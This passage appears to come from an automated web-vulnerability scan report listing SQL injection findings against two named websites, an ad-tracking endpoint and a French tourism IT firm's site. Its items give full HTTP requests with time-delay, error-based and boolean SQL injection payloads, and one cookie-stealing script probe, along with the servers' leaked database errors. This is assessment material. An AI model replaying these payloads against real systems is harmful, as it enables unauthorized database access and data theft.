GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121'&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:24:50 GMT
Expires: Fri, 25 Mar 2011 16:24:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQTQSQTT=KOALOEBCAKIMOAPDFMMIOOAL; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.36. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152'&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:26:34 GMT
Expires: Fri, 25 Mar 2011 16:26:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCADCBCAA=KMIHKHBCLPOJAPCAHAHDAIED; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.37. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the bannerCreativeAdModuleId parameter. The application took 20093 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152waitfor%20delay'0%3a0%3a20'--&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:59:00 GMT
Expires: Fri, 18 Mar 2011 15:58:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQATTSTR=CCLMNEEBAEKHIJIGGDPLOLAC; path=/
X-Powered-By: ASP.NET
Content-Length: 774
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @b
...[SNIP]...
1.38. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330'&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:23:07 GMT
Expires: Fri, 25 Mar 2011 16:22:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCBBDDCD=OCNMCLBCKPJNDLDPPIBMOOKM; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.39. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the campaignId parameter. The application took 20067 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330waitfor%20delay'0%3a0%3a20'--&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:57:34 GMT
Expires: Fri, 18 Mar 2011 15:57:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAATTQTQ=IJAHJCEBGMCFAOCMAGPOILMG; path=/
X-Powered-By: ASP.NET
Content-Length: 776
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860,
...[SNIP]...
1.40. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917&1'=1 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:31:01 GMT
Expires: Fri, 25 Mar 2011 16:30:37 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQSCARTC=LIIOKAACBNDPIBICCFGDDFMI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.41. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The redirect parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the redirect parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917' HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:27:27 GMT
Expires: Fri, 25 Mar 2011 16:27:03 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCACADBCA=AEBEOHBCDAJFMNEPBGODKFIN; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.42. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--'&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:14:19 GMT
Expires: Fri, 25 Mar 2011 16:13:55 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQSCARTC=OADKKAACJJGBPNHMDAMLPJAC; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.43. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the siteId parameter. The application took 20131 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860waitfor%20delay'0%3a0%3a20'--&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:54:38 GMT
Expires: Fri, 18 Mar 2011 15:54:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSCSRQRT=OLCIBHEBHAINHMLGMONBABNF; path=/
X-Powered-By: ASP.NET
Content-Length: 774
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860wait
...[SNIP]...
1.44. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the syndicationOutletId parameter. The application took 20025 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146waitfor%20delay'0%3a0%3a20'--&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:56:09 GMT
Expires: Fri, 18 Mar 2011 15:55:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQQCAQSD=BNIGIJDBBNDKLACAHBLKPMEP; path=/
X-Powered-By: ASP.NET
Content-Length: 776
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860,
...[SNIP]...
1.45. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146'&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:21:20 GMT
Expires: Fri, 25 Mar 2011 16:20:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQRSRQTQ=IAJNMDBCLDODEBLPPGIGIJKK; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.46. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [vpp cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The vpp cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the vpp cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39'; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:29:17 GMT
Expires: Fri, 25 Mar 2011 16:28:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQRSRABC=DDJJGOPBFPILNKKNIONPBCAI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
1.47. http://www.b2f-concept.com/KERNEL/ [ASPSESSIONIDCSABRTBS cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The ASPSESSIONIDCSABRTBS cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the ASPSESSIONIDCSABRTBS cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/ HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA')waitfor%20delay'0%3a0%3a20'--; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6596
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:20:54 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...
<div id="MTOP">pageUniverselle.asp: [Microsoft][ODBC SQL Server Driver][SQL Server]Ligne 1 : syntaxe incorrecte vers '3'.</div>
...[SNIP]...
1.48. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payloads 16491580'%20or%201%3d1--%20 and 16491580'%20or%201%3d2--%20 were each submitted in the NODE_ID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /KERNEL/?NODE_ID={2124CD9C-901D-4D4E-A690-79703CC24099}16491580'%20or%201%3d1--%20&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03} HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 206
Content-Type: text/html
Expires: Sat, 19 Mar 2011 01:59:16 GMT
Cache-control: private


<html>
<head>
<title>Groupe B2F Concept - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur </h2>
Cette page n'existe plus
</body>
</html>

Request 2

GET /KERNEL/?NODE_ID={2124CD9C-901D-4D4E-A690-79703CC24099}16491580'%20or%201%3d2--%20&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03} HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 02:00:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6608
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:20:21 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation et h&#233;bergement de sites Internet, Intranet, Extranet, SMS, centrales de r&#233;servation, e-tourisme, e-business. Centrales de r&#233;servation, place de march&#233;, ">
<meta name="Keywords" content="B2f, icor, Soprane, france, savoie, rhone-alpes, chambery, technolac, tourisme, infographie, reseau, web, internet, multimedia, logiciel, formation, intranet, informatique, reservation, hebergement, messagerie, adsl, modem, service, ssii, e-business, e-tourisme, securite, communication, abonnement, centrale, centre, serveur, numeris, rh&#244;ne-alpes, chamb&#233;ry, num&#233;ris, r&#233;seau, multim&#233;dia, r&#233;servation, h&#233;bergement, s&#233;curit&#233;, rh&#244;nes-alpes, chamb&#233;ry, r&#233;seau, multim&#233;dia, r&#233;servation, h&#233;bergement, num&#233;ris, s&#233;curit&#233;,">
<title>Groupe B2F Concept - Accueil</title>
<base href="http://www.b2f-concept.com/KERNEL/">

<link rel="stylesheet" href="default.css" type="text/css">
<!-- B2F group styles -->
<link rel="stylesheet" href="CSS.asp?id={93A6C784-63F3-4C68-B15D-CBC958ACF036}&DB=CLT3" type="text/css">
<!-- referencement -->
<link rel="stylesheet" href="CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}&DB=CLT3" type="text/css">

<style type="text/css">
#BODY    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px;}
#TOP    {}
#MTOP    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#BOTTOM    {}
#MBOTTOM    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
